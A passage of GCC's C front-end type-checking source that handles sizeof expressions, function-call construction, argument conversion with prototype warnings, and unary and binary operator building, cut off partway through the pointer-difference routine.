tree folded_expr = c_fully_fold (expr.value, require_constant_value,
&expr_const_operands);
ret.value = c_sizeof (loc, TREE_TYPE (folded_expr));
c_last_sizeof_arg = expr.value;
c_last_sizeof_loc = loc;
ret.original_code = SIZEOF_EXPR;
ret.original_type = NULL;
if (c_vla_type_p (TREE_TYPE (folded_expr)))
{
/* sizeof is evaluated when given a vla (C99 6.5.3.4p2). */
ret.value = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret.value),
folded_expr, ret.value);
C_MAYBE_CONST_EXPR_NON_CONST (ret.value) = !expr_const_operands;
SET_EXPR_LOCATION (ret.value, loc);
}
pop_maybe_used (C_TYPE_VARIABLE_SIZE (TREE_TYPE (folded_expr)));
}
return ret;
}
/* Return the result of sizeof applied to T, a structure for the type
name passed to sizeof (rather than the type itself). LOC is the
location of the original expression. */
struct c_expr
c_expr_sizeof_type (location_t loc, struct c_type_name *t)
{
tree type;
struct c_expr ret;
tree type_expr = NULL_TREE;
bool type_expr_const = true;
type = groktypename (t, &type_expr, &type_expr_const);
ret.value = c_sizeof (loc, type);
c_last_sizeof_arg = type;
c_last_sizeof_loc = loc;
ret.original_code = SIZEOF_EXPR;
ret.original_type = NULL;
if ((type_expr || TREE_CODE (ret.value) == INTEGER_CST)
&& c_vla_type_p (type))
{
/* If the type is a [*] array, it is a VLA but is represented as
having a size of zero. In such a case we must ensure that
the result of sizeof does not get folded to a constant by
c_fully_fold, because if the size is evaluated the result is
not constant and so constraints on zero or negative size
arrays must not be applied when this sizeof call is inside
another array declarator. */
if (!type_expr)
type_expr = integer_zero_node;
ret.value = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret.value),
type_expr, ret.value);
C_MAYBE_CONST_EXPR_NON_CONST (ret.value) = !type_expr_const;
}
pop_maybe_used (type != error_mark_node
? C_TYPE_VARIABLE_SIZE (type) : false);
return ret;
}
/* Build a function call to function FUNCTION with parameters PARAMS.
The function call is at LOC.
PARAMS is a list--a chain of TREE_LIST nodes--in which the
TREE_VALUE of each node is a parameter-expression.
FUNCTION's data type may be a function type or a pointer-to-function. */
tree
build_function_call (location_t loc, tree function, tree params)
{
vec<tree, va_gc> *v;
tree ret;
vec_alloc (v, list_length (params));
for (; params; params = TREE_CHAIN (params))
v->quick_push (TREE_VALUE (params));
ret = c_build_function_call_vec (loc, vNULL, function, v, NULL);
vec_free (v);
return ret;
}
/* Give a note about the location of the declaration of DECL. */
static void
inform_declaration (tree decl)
{
if (decl && (TREE_CODE (decl) != FUNCTION_DECL || !DECL_IS_BUILTIN (decl)))
inform (DECL_SOURCE_LOCATION (decl), "declared here");
}
/* Build a function call to function FUNCTION with parameters PARAMS.
If FUNCTION is the result of resolving an overloaded target built-in,
ORIG_FUNDECL is the original function decl, otherwise it is null.
ORIGTYPES, if not NULL, is a vector of types; each element is
either NULL or the original type of the corresponding element in
PARAMS. The original type may differ from TREE_TYPE of the
parameter for enums. FUNCTION's data type may be a function type
or pointer-to-function. This function changes the elements of
PARAMS. */
tree
build_function_call_vec (location_t loc, vec<location_t> arg_loc,
tree function, vec<tree, va_gc> *params,
vec<tree, va_gc> *origtypes, tree orig_fundecl)
{
tree fntype, fundecl = NULL_TREE;
tree name = NULL_TREE, result;
tree tem;
int nargs;
tree *argarray;
/* Strip NON_LVALUE_EXPRs, etc., since we aren't using as an lvalue. */
STRIP_TYPE_NOPS (function);
/* Convert anything with function type to a pointer-to-function. */
if (TREE_CODE (function) == FUNCTION_DECL)
{
name = DECL_NAME (function);
if (flag_tm)
tm_malloc_replacement (function);
fundecl = function;
if (!orig_fundecl)
orig_fundecl = fundecl;
/* Atomic functions have type checking/casting already done. They are
often rewritten and don't match the original parameter list. */
if (name && !strncmp (IDENTIFIER_POINTER (name), "__atomic_", 9))
origtypes = NULL;
}
if (TREE_CODE (TREE_TYPE (function)) == FUNCTION_TYPE)
function = function_to_pointer_conversion (loc, function);
/* For Objective-C, convert any calls via a cast to OBJC_TYPE_REF
expressions, like those used for ObjC messenger dispatches. */
if (params && !params->is_empty ())
function = objc_rewrite_function_call (function, (*params)[0]);
function = c_fully_fold (function, false, NULL);
fntype = TREE_TYPE (function);
if (TREE_CODE (fntype) == ERROR_MARK)
return error_mark_node;
if (!(TREE_CODE (fntype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (fntype)) == FUNCTION_TYPE))
{
if (!flag_diagnostics_show_caret)
error_at (loc,
"called object %qE is not a function or function pointer",
function);
else if (DECL_P (function))
{
error_at (loc,
"called object %qD is not a function or function pointer",
function);
inform_declaration (function);
}
else
error_at (loc,
"called object is not a function or function pointer");
return error_mark_node;
}
if (fundecl && TREE_THIS_VOLATILE (fundecl))
current_function_returns_abnormally = 1;
/* fntype now gets the type of function pointed to. */
fntype = TREE_TYPE (fntype);
/* Convert the parameters to the types declared in the
function prototype, or apply default promotions. */
nargs = convert_arguments (loc, arg_loc, TYPE_ARG_TYPES (fntype), params,
origtypes, function, fundecl);
if (nargs < 0)
return error_mark_node;
/* Check that the function is called through a compatible prototype.
If it is not, warn. */
if (CONVERT_EXPR_P (function)
&& TREE_CODE (tem = TREE_OPERAND (function, 0)) == ADDR_EXPR
&& TREE_CODE (tem = TREE_OPERAND (tem, 0)) == FUNCTION_DECL
&& !comptypes (fntype, TREE_TYPE (tem)))
{
tree return_type = TREE_TYPE (fntype);
/* This situation leads to run-time undefined behavior. We can't,
therefore, simply error unless we can prove that all possible
executions of the program must execute the code. */
warning_at (loc, 0, "function called through a non-compatible type");
if (VOID_TYPE_P (return_type)
&& TYPE_QUALS (return_type) != TYPE_UNQUALIFIED)
pedwarn (loc, 0,
"function with qualified void return type called");
}
argarray = vec_safe_address (params);
/* Check that arguments to builtin functions match the expectations. */
if (fundecl
&& fndecl_built_in_p (fundecl)
&& !check_builtin_function_arguments (loc, arg_loc, fundecl,
orig_fundecl, nargs, argarray))
return error_mark_node;
/* Check that the arguments to the function are valid. */
bool warned_p = check_function_arguments (loc, fundecl, fntype,
nargs, argarray, &arg_loc);
if (name != NULL_TREE
&& !strncmp (IDENTIFIER_POINTER (name), "__builtin_", 10))
{
if (require_constant_value)
result
= fold_build_call_array_initializer_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
else
result = fold_build_call_array_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
if (TREE_CODE (result) == NOP_EXPR
&& TREE_CODE (TREE_OPERAND (result, 0)) == INTEGER_CST)
STRIP_TYPE_NOPS (result);
}
else
result = build_call_array_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
/* If -Wnonnull warning has been diagnosed, avoid diagnosing it again
later. */
if (warned_p && TREE_CODE (result) == CALL_EXPR)
TREE_NO_WARNING (result) = 1;
/* In this improbable scenario, a nested function returns a VM type.
Create a TARGET_EXPR so that the call always has a LHS, much as
what the C++ FE does for functions returning non-PODs. */
if (variably_modified_type_p (TREE_TYPE (fntype), NULL_TREE))
{
tree tmp = create_tmp_var_raw (TREE_TYPE (fntype));
result = build4 (TARGET_EXPR, TREE_TYPE (fntype), tmp, result,
NULL_TREE, NULL_TREE);
}
if (VOID_TYPE_P (TREE_TYPE (result)))
{
if (TYPE_QUALS (TREE_TYPE (result)) != TYPE_UNQUALIFIED)
pedwarn (loc, 0,
"function with qualified void return type called");
return result;
}
return require_complete_type (loc, result);
}
/* Like build_function_call_vec, but call also resolve_overloaded_builtin. */
tree
c_build_function_call_vec (location_t loc, vec<location_t> arg_loc,
tree function, vec<tree, va_gc> *params,
vec<tree, va_gc> *origtypes)
{
/* Strip NON_LVALUE_EXPRs, etc., since we aren't using as an lvalue. */
STRIP_TYPE_NOPS (function);
/* Convert anything with function type to a pointer-to-function. */
if (TREE_CODE (function) == FUNCTION_DECL)
{
/* Implement type-directed function overloading for builtins.
resolve_overloaded_builtin and targetm.resolve_overloaded_builtin
handle all the type checking. The result is a complete expression
that implements this function call. */
tree tem = resolve_overloaded_builtin (loc, function, params);
if (tem)
return tem;
}
return build_function_call_vec (loc, arg_loc, function, params, origtypes);
}
/* Helper for convert_arguments called to convert the VALue of argument
number ARGNUM from ORIGTYPE to the corresponding parameter number
PARMNUM and TYPE.
PLOC is the location where the conversion is being performed.
FUNCTION and FUNDECL are the same as in convert_arguments.
VALTYPE is the original type of VAL before the conversion and,
for EXCESS_PRECISION_EXPR, the operand of the expression.
NPC is true if VAL represents the null pointer constant (VAL itself
will have been folded to an integer constant).
RNAME is the same as FUNCTION except in Objective C when it's
the function selector.
EXCESS_PRECISION is true when VAL was originally represented
as EXCESS_PRECISION_EXPR.
WARNOPT is the same as in convert_for_assignment. */
static tree
convert_argument (location_t ploc, tree function, tree fundecl,
tree type, tree origtype, tree val, tree valtype,
bool npc, tree rname, int parmnum, int argnum,
bool excess_precision, int warnopt)
{
/* Formal parm type is specified by a function prototype. */
if (type == error_mark_node || !COMPLETE_TYPE_P (type))
{
error_at (ploc, "type of formal parameter %d is incomplete",
parmnum + 1);
return val;
}
/* Optionally warn about conversions that differ from the default
conversions. */
if (warn_traditional_conversion || warn_traditional)
{
unsigned int formal_prec = TYPE_PRECISION (type);
if (INTEGRAL_TYPE_P (type)
&& TREE_CODE (valtype) == REAL_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as integer rather "
"than floating due to prototype",
argnum, rname);
if (INTEGRAL_TYPE_P (type)
&& TREE_CODE (valtype) == COMPLEX_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as integer rather "
"than complex due to prototype",
argnum, rname);
else if (TREE_CODE (type) == COMPLEX_TYPE
&& TREE_CODE (valtype) == REAL_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as complex rather "
"than floating due to prototype",
argnum, rname);
else if (TREE_CODE (type) == REAL_TYPE
&& INTEGRAL_TYPE_P (valtype))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as floating rather "
"than integer due to prototype",
argnum, rname);
else if (TREE_CODE (type) == COMPLEX_TYPE
&& INTEGRAL_TYPE_P (valtype))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as complex rather "
"than integer due to prototype",
argnum, rname);
else if (TREE_CODE (type) == REAL_TYPE
&& TREE_CODE (valtype) == COMPLEX_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as floating rather "
"than complex due to prototype",
argnum, rname);
/* ??? At some point, messages should be written about
conversions between complex types, but that's too messy
to do now. */
else if (TREE_CODE (type) == REAL_TYPE
&& TREE_CODE (valtype) == REAL_TYPE)
{
/* Warn if any argument is passed as `float',
since without a prototype it would be `double'. */
if (formal_prec == TYPE_PRECISION (float_type_node)
&& type != dfloat32_type_node)
warning_at (ploc, 0,
"passing argument %d of %qE as %<float%> "
"rather than %<double%> due to prototype",
argnum, rname);
/* Warn if mismatch between argument and prototype
for decimal float types. Warn of conversions with
binary float types and of precision narrowing due to
prototype. */
else if (type != valtype
&& (type == dfloat32_type_node
|| type == dfloat64_type_node
|| type == dfloat128_type_node
|| valtype == dfloat32_type_node
|| valtype == dfloat64_type_node
|| valtype == dfloat128_type_node)
&& (formal_prec
<= TYPE_PRECISION (valtype)
|| (type == dfloat128_type_node
&& (valtype
!= dfloat64_type_node
&& (valtype
!= dfloat32_type_node)))
|| (type == dfloat64_type_node
&& (valtype
!= dfloat32_type_node))))
warning_at (ploc, 0,
"passing argument %d of %qE as %qT "
"rather than %qT due to prototype",
argnum, rname, type, valtype);
}
/* Detect integer changing in width or signedness.
These warnings are only activated with
-Wtraditional-conversion, not with -Wtraditional. */
else if (warn_traditional_conversion
&& INTEGRAL_TYPE_P (type)
&& INTEGRAL_TYPE_P (valtype))
{
tree would_have_been = default_conversion (val);
tree type1 = TREE_TYPE (would_have_been);
if (val == error_mark_node)
/* VAL could have been of incomplete type. */;
else if (TREE_CODE (type) == ENUMERAL_TYPE
&& (TYPE_MAIN_VARIANT (type)
== TYPE_MAIN_VARIANT (valtype)))
/* No warning if function asks for enum
and the actual arg is that enum type. */
;
else if (formal_prec != TYPE_PRECISION (type1))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"with different width due to prototype",
argnum, rname);
else if (TYPE_UNSIGNED (type) == TYPE_UNSIGNED (type1))
;
/* Don't complain if the formal parameter type
is an enum, because we can't tell now whether
the value was an enum--even the same enum. */
else if (TREE_CODE (type) == ENUMERAL_TYPE)
;
else if (TREE_CODE (val) == INTEGER_CST
&& int_fits_type_p (val, type))
/* Change in signedness doesn't matter
if a constant value is unaffected. */
;
/* If the value is extended from a narrower
unsigned type, it doesn't matter whether we
pass it as signed or unsigned; the value
certainly is the same either way. */
else if (TYPE_PRECISION (valtype) < TYPE_PRECISION (type)
&& TYPE_UNSIGNED (valtype))
;
else if (TYPE_UNSIGNED (type))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"as unsigned due to prototype",
argnum, rname);
else
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"as signed due to prototype",
argnum, rname);
}
}
/* Possibly restore an EXCESS_PRECISION_EXPR for the
sake of better warnings from convert_and_check. */
if (excess_precision)
val = build1 (EXCESS_PRECISION_EXPR, valtype, val);
tree parmval = convert_for_assignment (ploc, ploc, type,
val, origtype, ic_argpass,
npc, fundecl, function,
parmnum + 1, warnopt);
if (targetm.calls.promote_prototypes (fundecl ? TREE_TYPE (fundecl) : 0)
&& INTEGRAL_TYPE_P (type)
&& (TYPE_PRECISION (type) < TYPE_PRECISION (integer_type_node)))
parmval = default_conversion (parmval);
return parmval;
}
/* Convert the argument expressions in the vector VALUES
to the types in the list TYPELIST.
If TYPELIST is exhausted, or when an element has NULL as its type,
perform the default conversions.
ORIGTYPES is the original types of the expressions in VALUES. This
holds the type of enum values which have been converted to integral
types. It may be NULL.
FUNCTION is a tree for the called function. It is used only for
error messages, where it is formatted with %qE.
This is also where warnings about wrong number of args are generated.
ARG_LOC are locations of function arguments (if any).
Returns the actual number of arguments processed (which may be less
than the length of VALUES in some error situations), or -1 on
failure. */
static int
convert_arguments (location_t loc, vec<location_t> arg_loc, tree typelist,
vec<tree, va_gc> *values, vec<tree, va_gc> *origtypes,
tree function, tree fundecl)
{
unsigned int parmnum;
bool error_args = false;
const bool type_generic = fundecl
&& lookup_attribute ("type generic", TYPE_ATTRIBUTES (TREE_TYPE (fundecl)));
bool type_generic_remove_excess_precision = false;
bool type_generic_overflow_p = false;
tree selector;
/* Change pointer to function to the function itself for
diagnostics. */
if (TREE_CODE (function) == ADDR_EXPR
&& TREE_CODE (TREE_OPERAND (function, 0)) == FUNCTION_DECL)
function = TREE_OPERAND (function, 0);
/* Handle an ObjC selector specially for diagnostics. */
selector = objc_message_selector ();
/* For a call to a built-in function declared without a prototype,
set to the built-in function's argument list. */
tree builtin_typelist = NULL_TREE;
/* For type-generic built-in functions, determine whether excess
precision should be removed (classification) or not
(comparison). */
if (fundecl
&& fndecl_built_in_p (fundecl, BUILT_IN_NORMAL))
{
built_in_function code = DECL_FUNCTION_CODE (fundecl);
if (C_DECL_BUILTIN_PROTOTYPE (fundecl))
{
/* For a call to a built-in function declared without a prototype
use the types of the parameters of the internal built-in to
match those of the arguments to. */
if (tree bdecl = builtin_decl_explicit (code))
builtin_typelist = TYPE_ARG_TYPES (TREE_TYPE (bdecl));
}
/* For type-generic built-in functions, determine whether excess
precision should be removed (classification) or not
(comparison). */
if (type_generic)
switch (code)
{
case BUILT_IN_ISFINITE:
case BUILT_IN_ISINF:
case BUILT_IN_ISINF_SIGN:
case BUILT_IN_ISNAN:
case BUILT_IN_ISNORMAL:
case BUILT_IN_FPCLASSIFY:
type_generic_remove_excess_precision = true;
break;
case BUILT_IN_ADD_OVERFLOW_P:
case BUILT_IN_SUB_OVERFLOW_P:
case BUILT_IN_MUL_OVERFLOW_P:
/* The last argument of these type-generic builtins
should not be promoted. */
type_generic_overflow_p = true;
break;
default:
break;
}
}
/* Scan the given expressions (VALUES) and types (TYPELIST), producing
individual converted arguments. */
tree typetail, builtin_typetail, val;
for (typetail = typelist,
builtin_typetail = builtin_typelist,
parmnum = 0;
values && values->iterate (parmnum, &val);
++parmnum)
{
/* The type of the function parameter (if it was declared with one). */
tree type = typetail ? TREE_VALUE (typetail) : NULL_TREE;
/* The type of the built-in function parameter (if the function
is a built-in). Used to detect type incompatibilities in
calls to built-ins declared without a prototype. */
tree builtin_type = (builtin_typetail
? TREE_VALUE (builtin_typetail) : NULL_TREE);
/* The original type of the argument being passed to the function. */
tree valtype = TREE_TYPE (val);
/* The called function (or function selector in Objective C). */
tree rname = function;
int argnum = parmnum + 1;
const char *invalid_func_diag;
/* Set for EXCESS_PRECISION_EXPR arguments. */
bool excess_precision = false;
/* The value of the argument after conversion to the type
of the function parameter it is passed to. */
tree parmval;
/* Some __atomic_* builtins have additional hidden argument at
position 0. */
location_t ploc
= !arg_loc.is_empty () && values->length () == arg_loc.length ()
? expansion_point_location_if_in_system_header (arg_loc[parmnum])
: input_location;
if (type == void_type_node)
{
if (selector)
error_at (loc, "too many arguments to method %qE", selector);
else
error_at (loc, "too many arguments to function %qE", function);
inform_declaration (fundecl);
return error_args ? -1 : (int) parmnum;
}
if (builtin_type == void_type_node)
{
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
"too many arguments to built-in function %qE "
"expecting %d", function, parmnum))
inform_declaration (fundecl);
builtin_typetail = NULL_TREE;
}
if (selector && argnum > 2)
{
rname = selector;
argnum -= 2;
}
/* Determine if VAL is a null pointer constant before folding it. */
bool npc = null_pointer_constant_p (val);
/* If there is excess precision and a prototype, convert once to
the required type rather than converting via the semantic
type. Likewise without a prototype a float value represented
as long double should be converted once to double. But for
type-generic classification functions excess precision must
be removed here. */
if (TREE_CODE (val) == EXCESS_PRECISION_EXPR
&& (type || !type_generic || !type_generic_remove_excess_precision))
{
val = TREE_OPERAND (val, 0);
excess_precision = true;
}
val = c_fully_fold (val, false, NULL);
STRIP_TYPE_NOPS (val);
val = require_complete_type (ploc, val);
/* Some floating-point arguments must be promoted to double when
no type is specified by a prototype. This applies to
arguments of type float, and to architecture-specific types
(ARM __fp16), but not to _FloatN or _FloatNx types. */
bool promote_float_arg = false;
if (type == NULL_TREE
&& TREE_CODE (valtype) == REAL_TYPE
&& (TYPE_PRECISION (valtype)
<= TYPE_PRECISION (double_type_node))
&& TYPE_MAIN_VARIANT (valtype) != double_type_node
&& TYPE_MAIN_VARIANT (valtype) != long_double_type_node
&& !DECIMAL_FLOAT_MODE_P (TYPE_MODE (valtype)))
{
/* Promote this argument, unless it has a _FloatN or
_FloatNx type. */
promote_float_arg = true;
for (int i = 0; i < NUM_FLOATN_NX_TYPES; i++)
if (TYPE_MAIN_VARIANT (valtype) == FLOATN_NX_TYPE_NODE (i))
{
promote_float_arg = false;
break;
}
}
if (type != NULL_TREE)
{
tree origtype = (!origtypes) ? NULL_TREE : (*origtypes)[parmnum];
parmval = convert_argument (ploc, function, fundecl, type, origtype,
val, valtype, npc, rname, parmnum, argnum,
excess_precision, 0);
}
else if (promote_float_arg)
{
if (type_generic)
parmval = val;
else
{
/* Convert `float' to `double'. */
if (warn_double_promotion && !c_inhibit_evaluation_warnings)
warning_at (ploc, OPT_Wdouble_promotion,
"implicit conversion from %qT to %qT when passing "
"argument to function",
valtype, double_type_node);
parmval = convert (double_type_node, val);
}
}
else if ((excess_precision && !type_generic)
|| (type_generic_overflow_p && parmnum == 2))
/* A "double" argument with excess precision being passed
without a prototype or in variable arguments.
The last argument of __builtin_*_overflow_p should not be
promoted. */
parmval = convert (valtype, val);
else if ((invalid_func_diag =
targetm.calls.invalid_arg_for_unprototyped_fn (typelist, fundecl, val)))
{
error (invalid_func_diag);
return -1;
}
else if (TREE_CODE (val) == ADDR_EXPR && reject_gcc_builtin (val))
{
return -1;
}
else
/* Convert `short' and `char' to full-size `int'. */
parmval = default_conversion (val);
(*values)[parmnum] = parmval;
if (parmval == error_mark_node)
error_args = true;
if (!type && builtin_type && TREE_CODE (builtin_type) != VOID_TYPE)
{
/* For a call to a built-in function declared without a prototype,
perform the conversions from the argument to the expected type
but issue warnings rather than errors for any mismatches.
Ignore the converted argument and use the PARMVAL obtained
above by applying default conversions instead. */
tree origtype = (!origtypes) ? NULL_TREE : (*origtypes)[parmnum];
convert_argument (ploc, function, fundecl, builtin_type, origtype,
val, valtype, npc, rname, parmnum, argnum,
excess_precision,
OPT_Wbuiltin_declaration_mismatch);
}
if (typetail)
typetail = TREE_CHAIN (typetail);
if (builtin_typetail)
builtin_typetail = TREE_CHAIN (builtin_typetail);
}
gcc_assert (parmnum == vec_safe_length (values));
if (typetail != NULL_TREE && TREE_VALUE (typetail) != void_type_node)
{
error_at (loc, "too few arguments to function %qE", function);
inform_declaration (fundecl);
return -1;
}
if (builtin_typetail && TREE_VALUE (builtin_typetail) != void_type_node)
{
unsigned nargs = parmnum;
for (tree t = builtin_typetail; t; t = TREE_CHAIN (t))
++nargs;
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
"too few arguments to built-in function %qE "
"expecting %u", function, nargs - 1))
inform_declaration (fundecl);
}
return error_args ? -1 : (int) parmnum;
}
/* This is the entry point used by the parser to build unary operators
in the input. CODE, a tree_code, specifies the unary operator, and
ARG is the operand. For unary plus, the C parser currently uses
CONVERT_EXPR for code.
LOC is the location to use for the tree generated.
*/
struct c_expr
parser_build_unary_op (location_t loc, enum tree_code code, struct c_expr arg)
{
struct c_expr result;
result.original_code = code;
result.original_type = NULL;
if (reject_gcc_builtin (arg.value))
{
result.value = error_mark_node;
}
else
{
result.value = build_unary_op (loc, code, arg.value, false);
if (TREE_OVERFLOW_P (result.value) && !TREE_OVERFLOW_P (arg.value))
overflow_warning (loc, result.value, arg.value);
}
/* We are typically called when parsing a prefix token at LOC acting on
ARG. Reflect this by updating the source range of the result to
start at LOC and end at the end of ARG. */
set_c_expr_source_range (&result,
loc, arg.get_finish ());
return result;
}
/* Returns true if TYPE is a character type, *not* including wchar_t. */
static bool
char_type_p (tree type)
{
return (type == char_type_node
|| type == unsigned_char_type_node
|| type == signed_char_type_node
|| type == char16_type_node
|| type == char32_type_node);
}
/* This is the entry point used by the parser to build binary operators
in the input. CODE, a tree_code, specifies the binary operator, and
ARG1 and ARG2 are the operands. In addition to constructing the
expression, we check for operands that were written with other binary
operators in a way that is likely to confuse the user.
LOCATION is the location of the binary operator. */
struct c_expr
parser_build_binary_op (location_t location, enum tree_code code,
struct c_expr arg1, struct c_expr arg2)
{
struct c_expr result;
enum tree_code code1 = arg1.original_code;
enum tree_code code2 = arg2.original_code;
tree type1 = (arg1.original_type
? arg1.original_type
: TREE_TYPE (arg1.value));
tree type2 = (arg2.original_type
? arg2.original_type
: TREE_TYPE (arg2.value));
result.value = build_binary_op (location, code,
arg1.value, arg2.value, true);
result.original_code = code;
result.original_type = NULL;
if (TREE_CODE (result.value) == ERROR_MARK)
{
set_c_expr_source_range (&result,
arg1.get_start (),
arg2.get_finish ());
return result;
}
if (location != UNKNOWN_LOCATION)
protected_set_expr_location (result.value, location);
set_c_expr_source_range (&result,
arg1.get_start (),
arg2.get_finish ());
/* Check for cases such as x+y<<z which users are likely
to misinterpret. */
if (warn_parentheses)
warn_about_parentheses (location, code, code1, arg1.value, code2,
arg2.value);
if (warn_logical_op)
warn_logical_operator (location, code, TREE_TYPE (result.value),
code1, arg1.value, code2, arg2.value);
if (warn_tautological_compare)
{
tree lhs = arg1.value;
tree rhs = arg2.value;
if (TREE_CODE (lhs) == C_MAYBE_CONST_EXPR)
{
if (C_MAYBE_CONST_EXPR_PRE (lhs) != NULL_TREE
&& TREE_SIDE_EFFECTS (C_MAYBE_CONST_EXPR_PRE (lhs)))
lhs = NULL_TREE;
else
lhs = C_MAYBE_CONST_EXPR_EXPR (lhs);
}
if (TREE_CODE (rhs) == C_MAYBE_CONST_EXPR)
{
if (C_MAYBE_CONST_EXPR_PRE (rhs) != NULL_TREE
&& TREE_SIDE_EFFECTS (C_MAYBE_CONST_EXPR_PRE (rhs)))
rhs = NULL_TREE;
else
rhs = C_MAYBE_CONST_EXPR_EXPR (rhs);
}
if (lhs != NULL_TREE && rhs != NULL_TREE)
warn_tautological_cmp (location, code, lhs, rhs);
}
if (warn_logical_not_paren
&& TREE_CODE_CLASS (code) == tcc_comparison
&& code1 == TRUTH_NOT_EXPR
&& code2 != TRUTH_NOT_EXPR
/* Avoid warning for !!x == y. */
&& (TREE_CODE (arg1.value) != NE_EXPR
|| !integer_zerop (TREE_OPERAND (arg1.value, 1))))
{
/* Avoid warning for !b == y where b has _Bool type. */
tree t = integer_zero_node;
if (TREE_CODE (arg1.value) == EQ_EXPR
&& integer_zerop (TREE_OPERAND (arg1.value, 1))
&& TREE_TYPE (TREE_OPERAND (arg1.value, 0)) == integer_type_node)
{
t = TREE_OPERAND (arg1.value, 0);
do
{
if (TREE_TYPE (t) != integer_type_node)
break;
if (TREE_CODE (t) == C_MAYBE_CONST_EXPR)
t = C_MAYBE_CONST_EXPR_EXPR (t);
else if (CONVERT_EXPR_P (t))
t = TREE_OPERAND (t, 0);
else
break;
}
while (1);
}
if (TREE_CODE (TREE_TYPE (t)) != BOOLEAN_TYPE)
warn_logical_not_parentheses (location, code, arg1.value, arg2.value);
}
/* Warn about comparisons against string literals, with the exception
of testing for equality or inequality of a string literal with NULL. */
if (code == EQ_EXPR || code == NE_EXPR)
{
if ((code1 == STRING_CST
&& !integer_zerop (tree_strip_nop_conversions (arg2.value)))
|| (code2 == STRING_CST
&& !integer_zerop (tree_strip_nop_conversions (arg1.value))))
warning_at (location, OPT_Waddress,
"comparison with string literal results in unspecified behavior");
/* Warn for ptr == '\0', it's likely that it should've been ptr[0]. */
if (POINTER_TYPE_P (type1)
&& null_pointer_constant_p (arg2.value)
&& char_type_p (type2))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wpointer_compare,
"comparison between pointer and zero character "
"constant"))
inform (arg1.get_start (),
"did you mean to dereference the pointer?");
}
else if (POINTER_TYPE_P (type2)
&& null_pointer_constant_p (arg1.value)
&& char_type_p (type1))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wpointer_compare,
"comparison between pointer and zero character "
"constant"))
inform (arg2.get_start (),
"did you mean to dereference the pointer?");
}
}
else if (TREE_CODE_CLASS (code) == tcc_comparison
&& (code1 == STRING_CST || code2 == STRING_CST))
warning_at (location, OPT_Waddress,
"comparison with string literal results in unspecified behavior");
if (TREE_OVERFLOW_P (result.value)
&& !TREE_OVERFLOW_P (arg1.value)
&& !TREE_OVERFLOW_P (arg2.value))
overflow_warning (location, result.value);
/* Warn about comparisons of different enum types. */
if (warn_enum_compare
&& TREE_CODE_CLASS (code) == tcc_comparison
&& TREE_CODE (type1) == ENUMERAL_TYPE
&& TREE_CODE (type2) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (type1) != TYPE_MAIN_VARIANT (type2))
warning_at (location, OPT_Wenum_compare,
"comparison between %qT and %qT",
type1, type2);
return result;
}
/* Return a tree for the difference of pointers OP0 and OP1.
The resulting tree has type ptrdiff_t. If POINTER_SUBTRACT sanitization is
enabled, assign to INSTRUMENT_EXPR call to libsanitizer. */
static tree
pointer_diff (location_t loc, tree op0, tree op1, tree *instrument_expr)
{
tree restype = ptrdiff_type_node;
tree result, inttype;
addr_space_t as0 = TYPE_ADDR_SPACE (TREE_TYPE (TREE_TYPE (op0)));
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (TREE_TYPE (op1)));
tree target_type = TREE_TYPE (TREE_TYPE (op0));
tree orig_op0 = op0;
tree orig_op1 = op1;
/* If the operands point into different address spaces, we need to
explicitly convert them to pointers into the common address space
before we can subtract the numerical address values. */
if (as0 != as1)
{
addr_space_t as_common;
tree common_type;
/* Determine the common superset address space. This is guaranteed
to exist because the caller verified that comp_target_types
returned non-zero. */
if (!addr_space_superset (as0, as1, &as_common))
gcc_unreachable ();
common_type = common_pointer_type (TREE_TYPE (op0), TREE_TYPE (op1));
op0 = convert (common_type, op0);
op1 = convert (common_type, op1);
}
/* Determine integer type result of the subtraction. This will usually
be the same as the result type (ptrdiff_t), but may need to be a wider
type if pointers for the address space are wider than ptrdiff_t. */
if (TYPE_PRECISION (restype) < TYPE_PRECISION (TREE_TYPE (op0)))
inttype = c_common_type_for_size (TYPE_PRECISION (TREE_TYPE (op0)), 0);
else
inttype = restype;
if (TREE_CODE (target_type) == VOID_TYPE)
pedwarn (loc, OPT_Wpointer_arith,
"pointer of type %<void *%> used in subtraction");
if (TREE_CODE (target_type) == FUNCTION_TYPE)
pedwarn (loc, OPT_Wpointer_arith,
"pointer to a function used in subtraction");
if (sanitize_flags_p (SANITIZE_POINTER_SUBTRACT))
{
gcc_assert (current_function_decl != NULL_TREE);
op0 = save_expr (op0);
op1 = save_expr (op1);
tree tt = builtin_decl_explicit (BUILT_IN_ASAN_POINTER_SUBTRACT);
*instrument_expr = build_call_expr_loc (loc, tt, 2, op0, op1);
}
/* First do the subtraction, then build the divide operator
and only convert at the very end.
Do not do default conversions in case restype is a short type. */
/* POINTER_DIFF_EXPR requires a signed integer type of the same size as
pointers. If some platform cannot provide that, or has a larger
ptrdiff_type to support differences larger than half the address
space, cast the pointers to some larger integer type and do the
computations in that type. */
if (TYPE_PRECISION (inttype) > TYPE_PRECISION (TREE_TYPE (op0)))
op0 = build_binary_op (loc, MINUS_EXPR, convert (inttype, op0),
convert (inttype, op1), false);
else
{
/* Cast away qualifiers. */
op0 = convert (c_common_type (TREE_TYPE (op0), TREE_TYPE (op0)), op0);
op1 = convert (c_common_type (TREE_TYPE (op1), TREE_TYPE (op1)), op1);
